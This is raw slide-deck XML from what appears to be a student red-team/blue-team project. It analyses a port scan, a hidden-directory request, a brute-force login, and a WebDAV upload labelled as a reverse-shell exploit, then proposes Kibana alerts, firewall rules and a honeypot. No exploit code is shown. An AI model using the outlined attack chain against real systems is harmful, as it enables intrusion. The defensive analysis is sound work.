          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1333" name="Google Shape;1333;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5225150" y="1220025"/>
            <a:ext cx="289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Spike in connections on </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>June 24, 2021 at 11:44 pm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1334" name="Google Shape;1334;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3608584" y="2192763"/>
            <a:ext cx="4660450" cy="2366750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1335" name="Google Shape;133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34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="2500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13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Analysis: Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1341" name="Google Shape;1341;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342" name="Google Shape;1342;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="778900"/>
            <a:ext cx="8409300" cy="39744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343" name="Google Shape;1343;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="26632" l="0" r="8742" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="402263" y="986463"/>
            <a:ext cx="8339476" cy="3559274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1344" name="Google Shape;1344;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5" name="Google Shape;1345;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5344925" y="2121825"/>
            <a:ext cx="1369800" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="lef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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7668250" y="2095000"/>
            <a:ext cx="873000" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="frame">
            <a:avLst>
              <a:gd fmla="val 12500" name="adj1"/>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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1906350" y="2655525"/>
            <a:ext cx="5331300" cy="1966200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solid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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All from 192.168.1.90</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June 29, 2021</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Between 2:11:10 to 2:11:55 </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(45 seconds)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="18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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✔ How to access corporate WebDAV server</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 CEO’s encrypted password.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1348" name="Google Shape;1348;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="72013" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3126325" y="990552"/>
            <a:ext cx="5324475" cy="67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345"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn dur="2700"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1345"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav fmla="" tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x+1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav fmla="" tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1346"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3700"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn fill="hold" nodeType="after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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4700"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn fill="hold" nodeType="after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4700"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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Analysis: Uncovering the Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1354" name="Google Shape;1354;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355" name="Google Shape;1355;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="762000"/>
            <a:ext cx="8409300" cy="39930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  </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1356" name="Google Shape;1356;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7479" l="0" r="0" t="35164"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="521000" y="1102475"/>
            <a:ext cx="7438599" cy="2440825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1357" name="Google Shape;1357;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58" name="Google Shape;1358;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="66864" t="23792"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5787922" y="1916925"/>
            <a:ext cx="2645804" cy="262320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5000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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Analysis: WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1364" name="Google Shape;136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365" name="Google Shape;1365;p81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="751538"/>
            <a:ext cx="8409300" cy="39576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AV connection.  </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1366" name="Google Shape;1366;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="522800" y="994725"/>
            <a:ext cx="7817188" cy="3154037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1367" name="Google Shape;1367;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Analysis: WebDAV Upload/Access </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Reverse-Shell Exploit)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373" name="Google Shape;1373;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374" name="Google Shape;1374;p82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="738625"/>
            <a:ext cx="8409300" cy="39606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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1375" name="Google Shape;1375;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76" name="Google Shape;1376;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="17958" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="414337" y="940250"/>
            <a:ext cx="8315326" cy="2420275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1377" name="Google Shape;1377;p82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1095375" y="2353650"/>
            <a:ext cx="1971600" cy="3315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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1095375" y="1897400"/>
            <a:ext cx="2247900" cy="3315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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1095375" y="2598525"/>
            <a:ext cx="1314600" cy="331500"/>
          </a:xfrm>
          <a:prstGeom prst="frame">
            <a:avLst>
              <a:gd fmla="val 1250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5000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="137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3200"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1377"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn fill="hold">
                            <p:stCondLst>
                              <p:cond delay="8200"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn fill="hold" nodeType="after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4000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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64" name="Shape 1064"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1065" name="Google Shape;1065;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289200" y="2012400"/>
            <a:ext cx="8565600" cy="69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txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274350" y="2012400"/>
            <a:ext cx="8595300" cy="6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34F5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Overall Risk Analysis</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1067" name="Google Shape;1067;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383" name="Shape 1383"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1384" name="Google Shape;1384;p83"/>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385" name="Google Shape;1385;p83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320400" y="1713750"/>
            <a:ext cx="8503200" cy="1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3"/>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34F5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="134F5C"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Proposed Alarms and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="134F5C"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="134F5C"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="134F5C"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1387" name="Google Shape;1387;p8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Mitigation … Port Scan </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reconnaissance</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Protection)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1393" name="Google Shape;1393;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="8730000" cy="2268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Speaker’s Notes include the basic steps for creating an alert in Kibana. See also: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.elastic.co/guide/en/kibana/7.x/alerting-getting-started.html</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1394" name="Google Shape;1394;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1763788"/>
            <a:ext cx="4536600" cy="28272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i="1" lang="en" sz="1800"/>
              <a:t>Alert </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1800"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1800"/>
              <a:t>watching</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1800"/>
              <a:t> for: </a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t>harp increase in Packetbeat</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1700"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> “Connections over Time”</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>within seconds</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="14"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1700"/>
              <a:t>Conditions for alert/alarm activation:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>100 scans</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en" sz="1800"/>
              <a:t>2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⧫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>per microsecond </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1395" name="Google Shape;1395;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4584975" y="1438125"/>
            <a:ext cx="44163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b="1" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>Install stateful firewall</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800"/>
            </a:br>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>Configure firewall to </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>block additional packets </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>after Kibana alert is triggered</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>Filter ports, limit to whitelisted IPs only</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800"/>
            </a:br>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>Install “honeypot”</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1396" name="Google Shape;1396;p84"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="400050" y="847725"/>
            <a:ext cx="2762400" cy="590400"/>
            <a:chOff x="400050" y="847725"/>
            <a:chExt cx="2762400" cy="590400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1397" name="Google Shape;1397;p84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="400050" y="847725"/>
              <a:ext cx="2762400" cy="590400"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd fmla="val -20833" name="adj1"/>
                <a:gd fmla="val 62500"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4"/>
            <p:cNvSpPr txBox="1"/>
